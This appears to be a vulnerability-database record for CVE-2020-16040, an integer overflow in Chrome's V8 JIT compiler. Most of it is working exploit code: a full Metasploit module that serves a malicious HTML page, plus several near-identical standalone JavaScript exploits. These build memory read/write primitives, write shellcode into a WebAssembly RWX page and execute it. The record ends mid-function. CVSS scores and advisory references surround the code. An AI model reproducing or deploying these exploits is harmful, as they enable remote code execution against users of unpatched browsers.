Google Chrome SimplfiedLowering Integer Overflow

2021-04-09T00:00:00

Description

{"id": "PACKETSTORM:162144", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Google Chrome SimplfiedLowering Integer Overflow", "description": "", "published": "2021-04-09T00:00:00", "modified": "2021-04-09T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/162144/Google-Chrome-SimplfiedLowering-Integer-Overflow.html", "reporter": "Rajvardhan Agarwal", "references": [], "cvelist": ["CVE-2020-16040"], "immutableFields": [], "lastseen": "2021-04-09T15:51:05", "viewCount": 767, "enchantments": {"dependencies": {"references": [{"type": "archlinux", "idList": ["ASA-202012-14"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-3319"]}, {"type": "chrome", "idList": ["GCSA-2952833725589367718"]}, {"type": "cve", "idList": ["CVE-2020-16040"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4824-1:11EBB"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-16040"]}, {"type": "exploitdb", "idList": ["EDB-ID:49745"]}, {"type": "fedora", "idList": ["FEDORA:36BA8304C362", "FEDORA:7C45D30B3717"]}, {"type": "freebsd", "idList": ["01FFD06A-36ED-11EB-B655-3065EC8FD3EC"]}, {"type": "gentoo", "idList": ["GLSA-202012-05"]}, {"type": "kaspersky", "idList": ["KLA12018"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-BROWSER-CHROME_SIMPLIFIEDLOWERING_OVERFLOW-"]}, {"type": "mscve", "idList": ["MS:ADV200002"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-4824.NASL", "FEDORA_2020-5B9C42F1B9.NASL", "FEDORA_2020-F43EFD09E8.NASL", "FREEBSD_PKG_01FFD06A36ED11EBB6553065EC8FD3EC.NASL", "GENTOO_GLSA-202012-05.NASL", "GOOGLE_CHROME_87_0_4280_88.NASL", "MACOSX_GOOGLE_CHROME_87_0_4280_88.NASL", "MICROSOFT_EDGE_CHROMIUM_87_0_664_57.NASL", "OPENSUSE-2020-2181.NASL", "OPENSUSE-2020-2216.NASL", "OPENSUSE-2020-2359.NASL", "OPENSUSE-2020-2360.NASL"]}, {"type": "osv", "idList": ["OSV:DSA-4824-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162087", "PACKETSTORM:162106"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:BCF35FC32C607E99444655FC5896B1EB"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:2181-1", "OPENSUSE-SU-2020:2213-1", "OPENSUSE-SU-2020:2216-1", "OPENSUSE-SU-2020:2229-1", "OPENSUSE-SU-2020:2359-1", "OPENSUSE-SU-2020:2360-1"]}, {"type": "threatpost", "idList": ["THREATPOST:54718EAE6A3AD996F13E22A17C765CCC", "THREATPOST:BE769DEEED5A9DC3EB7A86AD40F8F968"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-16040"]}, {"type": "veracode", "idList": ["VERACODE:28692"]}, {"type": "zdt", "idList": ["1337DAY-ID-36075", "1337DAY-ID-36094"]}]}, "score": {"value": 0.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "archlinux", "idList": ["ASA-202012-14"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-3319"]}, {"type": "chrome", "idList": ["GCSA-2952833725589367718"]}, {"type": "cve", "idList": ["CVE-2020-16040"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4824-1:11EBB"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-16040"]}, {"type": "exploitdb", "idList": ["EDB-ID:49745"]}, {"type": "fedora", "idList": ["FEDORA:36BA8304C362", "FEDORA:7C45D30B3717"]}, {"type": "freebsd", "idList": ["01FFD06A-36ED-11EB-B655-3065EC8FD3EC"]}, {"type": "gentoo", "idList": ["GLSA-202012-05"]}, {"type": "kaspersky", "idList": ["KLA12018"]}, {"type": "mscve", "idList": ["MS:ADV200002"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-4824.NASL", "FEDORA_2020-5B9C42F1B9.NASL", "FEDORA_2020-F43EFD09E8.NASL", "FREEBSD_PKG_01FFD06A36ED11EBB6553065EC8FD3EC.NASL", "GENTOO_GLSA-202012-05.NASL", "GOOGLE_CHROME_87_0_4280_88.NASL", "MACOSX_GOOGLE_CHROME_87_0_4280_88.NASL", "MICROSOFT_EDGE_CHROMIUM_87_0_664_57.NASL", "OPENSUSE-2020-2181.NASL", "OPENSUSE-2020-2216.NASL", "OPENSUSE-2020-2359.NASL", "OPENSUSE-2020-2360.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162087", "PACKETSTORM:162106"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:BCF35FC32C607E99444655FC5896B1EB"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:2181-1", "OPENSUSE-SU-2020:2213-1", "OPENSUSE-SU-2020:2216-1", "OPENSUSE-SU-2020:2229-1", "OPENSUSE-SU-2020:2359-1", "OPENSUSE-SU-2020:2360-1"]}, {"type": "threatpost", "idList": ["THREATPOST:BE769DEEED5A9DC3EB7A86AD40F8F968"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-16040"]}, {"type": "zdt", "idList": ["1337DAY-ID-36075", "1337DAY-ID-36094"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2020-16040", "epss": "0.175840000", "percentile": "0.952530000", "modified": "2023-03-16"}], "vulnersScore": 0.9}, "_state": {"dependencies": 1678920471, "score": 1678917189, "epss": 1679070268}, "_internal": {"score_hash": "b1cfba30a4bd4d1858073bb855f7b040"}, "sourceHref": "https://packetstormsecurity.com/files/download/162144/chrome_simplifiedlowering_overflow.rb.txt", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase', \n'Description' => %q{ \nThis module exploits an issue in Google Chrome versions before 87.0.4280.88 (64 bit). \nThe exploit makes use of a integer overflow in the SimplifiedLowering phase in turbofan. \nIt is used along with a typer hardening bypass using ArrayPrototypeShift to create a JSArray with a length of -1. \nThis is abused to gain arbitrary read/write into the isolate region. \nThen an ArrayBuffer can be used to achieve absolute arbitrary read/write. \nThe exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode. \nThe payload is executed within the sandboxed renderer process, the browser must be run with the --no-sandbox option for the payload to work correctly. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Rajvardhan Agarwal (r4j)', # exploit \n], \n'References' => [ \n['CVE', '2020-16040'], \n['URL', 'https://chromium-review.googlesource.com/c/v8/v8/+/2557498'], \n['URL', 'https://github.com/r4j0x00/exploits/tree/master/CVE-2020-16040'], \n['URL', 'https://faraz.faith/2021-01-07-cve-2020-16040-analysis/'], \n['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1150649'], \n], \n'Arch' => [ ARCH_X64 ], \n'DefaultTarget' => 0, \n'Targets' => \n[ \n['Linux - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'linux' }], \n['Windows 10 - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'win' }], \n['macOS - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'osx' }], \n], \n'DisclosureDate' => '2020-11-19' \n) \n) \nend \n \ndef on_request_uri(cli, request) \nprint_status(\"Sending #{request.uri} to #{request['User-Agent']}\") \nshellcode = Rex::Text.to_num(payload.encoded).gsub(/\\r\\n/, '') \njscript = <<~JS \nvar wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]) \nvar wasm_mod = new WebAssembly.Module(wasm_code); \nvar wasm_instance = new WebAssembly.Instance(wasm_mod); \nvar wasm_func = wasm_instance.exports.main; \n \nvar buf = new ArrayBuffer(8); \nvar f64_buf = new Float64Array(buf); \nvar u64_buf = new Uint32Array(buf); \nvar shellcode = new Uint8Array([#{shellcode}]); \nvar shellbuf = new ArrayBuffer(shellcode.length); \nvar dataview = new DataView(shellbuf); \n \nfunction ftoi(val) { \nf64_buf[0] = val; \nreturn BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); \n} \n \nfunction itof(val) { \nu64_buf[0] = Number(val & 0xffffffffn); \nu64_buf[1] = Number(val >> 32n); \nreturn f64_buf[0]; \n} \n \nfunction foo(a) { \nvar y = 0x7fffffff; \n \nif (a == NaN) y = NaN; \nif (a) y = -1; \n \nlet z = y + 1; \nz >>= 31; \nz = 0x80000000 - Math.sign(z|1); \n \nif(a) z = 0; \n \nvar arr = new Array(0-Math.sign(z)); \narr.shift(); \nvar cor = [1.1, 1.2, 1.3]; \n \nreturn [arr, cor]; \n} \n \ntry { \nfor(var i=0;i<0x3000;++i) \nfoo(true); \n \nvar x = foo(false); \n} catch (e) { \nlocation.reload(); \n} \nvar arr = x[0]; \nvar cor = x[1]; \n \nconst idx = 6; \narr[idx+10] = 0x4242; \n \nfunction addrof(k) { \narr[idx+1] = k; \nreturn ftoi(cor[0]) & 0xffffffffn; \n} \n \nfunction fakeobj(k) { \ncor[0] = itof(k); \nreturn arr[idx+1]; \n} \n \nvar float_array_map = ftoi(cor[3]); \n \nvar arr2 = [itof(float_array_map), 1.2, 2.3, 3.4]; \nvar fake = fakeobj(addrof(arr2) + 0x20n); \n \nfunction arbread(addr) { \nif (addr % 2n == 0) { \naddr += 1n; \n} \narr2[1] = itof((2n << 32n) + addr - 8n); \nreturn ftoi(fake[0]); \n} \n \nfunction arbwrite(addr, val) { \nif (addr % 2n == 0) { \naddr += 1n; \n} \narr2[1] = itof((2n << 32n) + addr - 8n); \nfake[0] = itof(BigInt(val)); \n} \n \nfunction copy_shellcode(addr, shellcode) { \nlet buf_addr = addrof(shellbuf); \nlet backing_store_addr = buf_addr + 0x14n; \narbwrite(backing_store_addr, addr); \n \nfor (let i = 0; i < shellcode.length; i++) { \ndataview.setUint8(i, shellcode[i]); \n} \n} \n \nvar rwx_page_addr = arbread(addrof(wasm_instance) + 0x68n); \ncopy_shellcode(rwx_page_addr, shellcode); \nwasm_func(); \nJS \n \nhtml = <<~HTML \n<html> \n<head> \n<script> \n#{jscript} \n</script> \n</head> \n<body> \n</body> \n</html> \nHTML \nsend_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' }) \nend \n \nend \n`\n"}

{"checkpoint_advisories": [{"lastseen": "2022-02-16T19:33:46", "description": "A heap corruption vulnerability exists in Google Chrome. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-04-21T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome Heap Corruption (CVE-2020-16040)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16040"], "modified": "2021-04-21T00:00:00", "id": "CPAI-2020-3319", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2021-04-07T19:50:32", "description": "", "cvss3": {}, "published": "2021-04-07T00:00:00", "type": "packetstorm", "title": "Google Chrome 86.0.4240 V8 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-16040"], "modified": "2021-04-07T00:00:00", "id": "PACKETSTORM:162106", "href": "https://packetstormsecurity.com/files/162106/Google-Chrome-86.0.4240-V8-Remote-Code-Execution.html", "sourceData": "`/* \nBSD 2-Clause License \n \nCopyright (c) 2021, rajvardhan agarwal \nAll rights reserved. \n \nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met: \n \n1. Redistributions of source code must retain the above copyright notice, this \nlist of conditions and the following disclaimer. \n \n2. Redistributions in binary form must reproduce the above copyright notice, \nthis list of conditions and the following disclaimer in the documentation \nand/or other materials provided with the distribution. \n \nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \n*/ \n \n// Reference: https://faraz.faith/2021-01-07-cve-2020-16040-analysis/ \n \nvar wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]) \nvar wasm_mod = new WebAssembly.Module(wasm_code); \nvar wasm_instance = new WebAssembly.Instance(wasm_mod); \nvar f = wasm_instance.exports.main; \n \nvar buf = new ArrayBuffer(8); \nvar f64_buf = new Float64Array(buf); \nvar u64_buf = new Uint32Array(buf); \nlet buf2 = new ArrayBuffer(0x150); \n \nfunction ftoi(val) { \nf64_buf[0] = val; \nreturn BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); \n} \n \nfunction itof(val) { \nu64_buf[0] = Number(val & 0xffffffffn); \nu64_buf[1] = Number(val >> 32n); \nreturn f64_buf[0]; \n} \n \nfunction foo(a) { \nvar y = 0x7fffffff; \n \nif (a == NaN) y = NaN; \nif (a) y = -1; \n \nlet z = y + 1; \nz >>= 31; \nz = 0x80000000 - Math.sign(z|1); \n \nif(a) z = 0; \n \nvar arr = new Array(0-Math.sign(z)); \narr.shift(); \nvar cor = [1.1, 1.2, 1.3]; \n \nreturn [arr, cor]; \n} \n \nfor(var i=0;i<0x3000;++i) \nfoo(true); \n \nvar x = foo(false); \nvar arr = x[0]; \nvar cor = x[1]; \n \nconst idx = 6; \narr[idx+10] = 0x4242; \n \nfunction addrof(k) { \narr[idx+1] = k; \nreturn ftoi(cor[0]) & 0xffffffffn; \n} \n \nfunction fakeobj(k) { \ncor[0] = itof(k); \nreturn arr[idx+1]; \n} \n \nvar float_array_map = ftoi(cor[3]); \n \nvar arr2 = [itof(float_array_map), 1.2, 2.3, 3.4]; \nvar fake = fakeobj(addrof(arr2) + 0x20n); \n \nfunction arbread(addr) { \nif (addr % 2n == 0) { \naddr += 1n; \n} \narr2[1] = itof((2n << 32n) + addr - 8n); \nreturn (fake[0]); \n} \n \nfunction arbwrite(addr, val) { \nif (addr % 2n == 0) { \naddr += 1n; \n} \narr2[1] = itof((2n << 32n) + addr - 8n); \nfake[0] = itof(BigInt(val)); \n} \n \nfunction copy_shellcode(addr, shellcode) { \nlet dataview = new DataView(buf2); \nlet buf_addr = addrof(buf2); \nlet backing_store_addr = buf_addr + 0x14n; \narbwrite(backing_store_addr, addr); \n \nfor (let i = 0; i < shellcode.length; i++) { \ndataview.setUint32(4*i, shellcode[i], true); \n} \n} \n \nvar rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n)); \nconsole.log(\"[+] Address of rwx page: \" + rwx_page_addr.toString(16)); \nvar shellcode = [16889928,16843009,1213202689,1652108984,23227744,70338561,800606244,796029813,1349413218,1760004424,16855099,19149953,1208025345,1397310648,1497451600,3526447165,1510500946,1390543176,1222805832,16843192,16843009,3091746817,1617066286,16867949,604254536,1966061640,1647276659,827354729,141186806,3858843742,3867756630,257440618,2425393157]; \n/*var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; */ // windows shellcode \ncopy_shellcode(rwx_page_addr, shellcode); \nf(); \n \n`\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/162106/googlechrome870428088-exec.txt"}, {"lastseen": "2021-04-06T14:49:05", "description": "", "cvss3": {}, "published": "2021-04-06T00:00:00", "type": "packetstorm", "title": "Google Chrome 86.0.4240 V8 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-16040"], "modified": "2021-04-06T00:00:00", "id": "PACKETSTORM:162087", "href": "https://packetstormsecurity.com/files/162087/Google-Chrome-86.0.4240-V8-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Google Chrome prior 87.0.4280.88 V8 - Remote Code Execution \n# Date: 06/04/2021 \n# Exploit Author: Tobias Marcotto \n# Tested on: Kali Linux x64 \n# Version: 87.0.4280.88 \n# Description: Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. \n# CVE: CVE-2020-16040 \n \n********************************************************************************************************* \n \n \nvar wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]) \nvar wasm_mod = new WebAssembly.Module(wasm_code); \nvar wasm_instance = new WebAssembly.Instance(wasm_mod); \nvar f = wasm_instance.exports.main; \n \nvar buf = new ArrayBuffer(8); \nvar f64_buf = new Float64Array(buf); \nvar u64_buf = new Uint32Array(buf); \nlet buf2 = new ArrayBuffer(0x150); \n \nfunction ftoi(val) { \nf64_buf[0] = val; \nreturn BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); \n} \n \nfunction itof(val) { \nu64_buf[0] = Number(val & 0xffffffffn); \nu64_buf[1] = Number(val >> 32n); \nreturn f64_buf[0]; \n} \n \nfunction foo(a) { \nvar y = 0x7fffffff; \n \nif (a == NaN) y = NaN; \nif (a) y = -1; \n \nlet z = y + 1; \nz >>= 31; \nz = 0x80000000 - Math.sign(z|1); \n \nif(a) z = 0; \n \nvar arr = new Array(0-Math.sign(z)); \narr.shift(); \nvar cor = [1.1, 1.2, 1.3]; \n \nreturn [arr, cor]; \n} \n \nfor(var i=0;i<0x3000;++i) \nfoo(true); \n \nvar x = foo(false); \nvar arr = x[0]; \nvar cor = x[1]; \n \nconst idx = 6; \narr[idx+10] = 0x4242; \n \nfunction addrof(k) { \narr[idx+1] = k; \nreturn ftoi(cor[0]) & 0xffffffffn; \n} \n \nfunction fakeobj(k) { \ncor[0] = itof(k); \nreturn arr[idx+1]; \n} \n \nvar float_array_map = ftoi(cor[3]); \n \nvar arr2 = [itof(float_array_map), 1.2, 2.3, 3.4]; \nvar fake = fakeobj(addrof(arr2) + 0x20n); \n \nfunction arbread(addr) { \nif (addr % 2n == 0) { \naddr += 1n; \n} \narr2[1] = itof((2n << 32n) + addr - 8n); \nreturn (fake[0]); \n} \n \nfunction arbwrite(addr, val) { \nif (addr % 2n == 0) { \naddr += 1n; \n} \narr2[1] = itof((2n << 32n) + addr - 8n); \nfake[0] = itof(BigInt(val)); \n} \n \nfunction copy_shellcode(addr, shellcode) { \nlet dataview = new DataView(buf2); \nlet buf_addr = addrof(buf2); \nlet backing_store_addr = buf_addr + 0x14n; \narbwrite(backing_store_addr, addr); \n \nfor (let i = 0; i < shellcode.length; i++) { \ndataview.setUint32(4*i, shellcode[i], true); \n} \n} \n \nvar rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n)); \nconsole.log(\"[+] Address of rwx page: \" + rwx_page_addr.toString(16)); \nvar shellcode = [16889928,16843009,1213202689,1652108984,23227744,70338561,800606244,796029813,1349413218,1760004424,16855099,19149953,1208025345,1397310648,1497451600,3526447165,1510500946,1390543176,1222805832,16843192,16843009,3091746817,1617066286,16867949,604254536,1966061640,1647276659,827354729,141186806,3858843742,3867756630,257440618,2425393157]; \n/*var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; */ // windows shellcode \ncopy_shellcode(rwx_page_addr, shellcode); \nf();`\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/162087/googlechrome870428088-exec.txt"}], "ubuntucve": [{"lastseen": "2023-02-03T13:41:42", "description": "Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88\nallowed a remote attacker to potentially exploit heap corruption via a\ncrafted HTML page.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | The Debian chromium source package is called chromium-browser in Ubuntu \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | starting with Ubuntu 19.10, the chromium-browser package is just a script that installs the Chromium snap\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-01-08T00:00:00", "type": "ubuntucve", "title": "CVE-2020-16040", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16040"], "modified": "2021-01-08T00:00:00", "id": "UB:CVE-2020-16040", "href": "https://ubuntu.com/security/CVE-2020-16040", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "zdt": [{"lastseen": "2021-12-21T21:20:55", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-04-06T00:00:00", "type": "zdt", "title": "Google Chrome 86.0.4240 V8 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16040"], "modified": "2021-04-06T00:00:00", "id": "1337DAY-ID-36075", "href": "https://0day.today/exploit/description/36075", "sourceData": "# Exploit Title: Google Chrome 86.0.4240 V8 - Remote Code Execution\n# Exploit Author: Tobias Marcotto\n# Tested on: Kali Linux x64 \n# Version: 87.0.4280.88\n# Description: Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n# CVE: CVE-2020-16040\n\n*********************************************************************************************************\n\n\nvar wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])\nvar wasm_mod = new WebAssembly.Module(wasm_code);\nvar wasm_instance = new WebAssembly.Instance(wasm_mod);\nvar f = wasm_instance.exports.main;\n\nvar buf = new ArrayBuffer(8);\nvar f64_buf = new Float64Array(buf);\nvar u64_buf = new Uint32Array(buf);\nlet buf2 = new ArrayBuffer(0x150);\n\nfunction ftoi(val) {\n f64_buf[0] = val;\n return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);\n}\n\nfunction itof(val) {\n u64_buf[0] = Number(val & 0xffffffffn);\n u64_buf[1] = Number(val >> 32n);\n return f64_buf[0];\n}\n\nfunction foo(a) {\n var y = 0x7fffffff;\n\n if (a == NaN) y = NaN;\n if (a) y = -1;\n\n let z = y + 1;\n z >>= 31;\n z = 0x80000000 - Math.sign(z|1);\n\n if(a) z = 0;\n\n var arr = new Array(0-Math.sign(z));\n arr.shift();\n var cor = [1.1, 1.2, 1.3];\n\n return [arr, cor];\n}\n\nfor(var i=0;i<0x3000;++i)\n foo(true);\n\nvar x = foo(false);\nvar arr = x[0];\nvar cor = x[1];\n\nconst idx = 6;\narr[idx+10] = 0x4242;\n\nfunction addrof(k) {\n arr[idx+1] = k;\n return ftoi(cor[0]) & 0xffffffffn;\n}\n\nfunction fakeobj(k) {\n cor[0] = itof(k);\n return arr[idx+1];\n}\n\nvar float_array_map = ftoi(cor[3]);\n\nvar arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];\nvar fake = fakeobj(addrof(arr2) + 0x20n);\n\nfunction arbread(addr) {\n if (addr % 2n == 0) {\n addr += 1n;\n }\n arr2[1] = itof((2n << 32n) + addr - 8n);\n return (fake[0]);\n}\n\nfunction arbwrite(addr, val) {\n if (addr % 2n == 0) {\n addr += 1n;\n }\n arr2[1] = itof((2n << 32n) + addr - 8n);\n fake[0] = itof(BigInt(val));\n}\n\nfunction copy_shellcode(addr, shellcode) {\n let dataview = new DataView(buf2);\n let buf_addr = addrof(buf2);\n let backing_store_addr = buf_addr + 0x14n;\n arbwrite(backing_store_addr, addr);\n\n for (let i = 0; i < shellcode.length; i++) {\n 